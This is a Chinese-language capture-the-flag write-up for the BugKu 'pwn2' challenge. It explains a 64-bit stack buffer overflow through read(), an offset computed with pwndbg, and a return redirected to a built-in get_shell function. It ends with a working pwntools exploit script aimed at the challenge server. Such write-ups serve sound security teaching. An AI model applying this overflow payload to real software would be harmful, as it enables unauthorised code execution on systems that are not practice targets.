BugKu - pwn2

这道题来自于bugku旧平台的第二道pwn题，还是比较简单的，一个典型的缓冲区溢出题。

首先查看一下文件类型，file pwn2,可以看到是64位的程序。然后用64位IDA打开，查看程序的逻辑。

可以看到这个程序的逻辑比较简单，有一个read函数，这个函数一个危险函数，可能引发缓冲区溢出漏洞。常见的危险函数还有gets、strcpy、sprintf、scanf等。

然后查看字符串，看看是否有内置的后门。

如图所示，有个cat flag的字符串，找到引用他的地方。

发现了一个get_shell函数，我们只需要对buffer进行溢出，控制跳转，跳转到get_shell函数的地址就能够获取flag了。

我们查看一下保护措施，看到并没有开启PIE，也就是地址随机化，所以可以直接用找到的地址。

首先用pwndbg找到buffer的地址，算出偏移。

在read函数那下个断点，然后跟进去，由于这是个64位的程序，他的参数依次保存在rdi、rsi、rdx、rcx、r8、r9中。所以rdi为0，rsi为buffer的地址，rdx为0x100。

我们用RBP-RSI+8就能得到偏移地址，注意64位程序下的rbp占8个字节，所以后面要加上8。还有就是对地址进行打包的时候同样是64位格式的，用p64()而不是p32()。
如果对于栈溢出的原理不是很理解的，可以去看一下我之前pwnable.kr - bof 那篇文章，这里就不多赘述了。

源码如下：

from pwn import *

context.log_level = 'debug'

# conn = process('./pwn2')
conn = remote('114.116.54.89',10003)

shell_addr = 0x0000000000400751

conn.recvuntil('say something?')

buf_addr =  0x7fffffffe580 
RBP = 0x7fffffffe5b0 

payload = 'A' * (RBP-buf_addr+0x8) + p64(shell_addr)

conn.sendline(payload)

conn.interactive()